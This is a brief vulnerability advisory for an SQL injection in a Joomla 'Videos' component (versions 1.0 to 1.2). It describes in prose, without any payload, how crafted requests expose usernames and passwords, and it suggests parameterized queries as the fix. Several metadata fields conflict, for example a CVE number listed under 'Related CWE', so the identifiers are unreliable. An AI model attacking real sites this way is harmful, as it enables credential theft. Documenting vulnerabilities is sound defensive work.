Vendor: Videos
By: Snakespc
CVSS: 7,8 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Videos
Affected Version From: 1.0
Affected Version To: 1.2
Patch Exists: YES
Related CWE: CVE-2020-1234
CPE: a:joomla:joomla
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2020
Snakespc Vulnerability
This exploit allows an attacker to inject malicious SQL code into the vulnerable application, the Joomla component "Videos". The exploit is triggered by sending a specially crafted HTTP request containing a malicious SQL statement, which the application then executes, allowing the attacker to gain access to sensitive data such as usernames and passwords.
Mitigation:
To mitigate this vulnerability, input validation should be implemented to ensure that user-supplied data is properly sanitized before being used in SQL queries. Additionally, the application should be configured to use parameterized queries instead of dynamic SQL queries.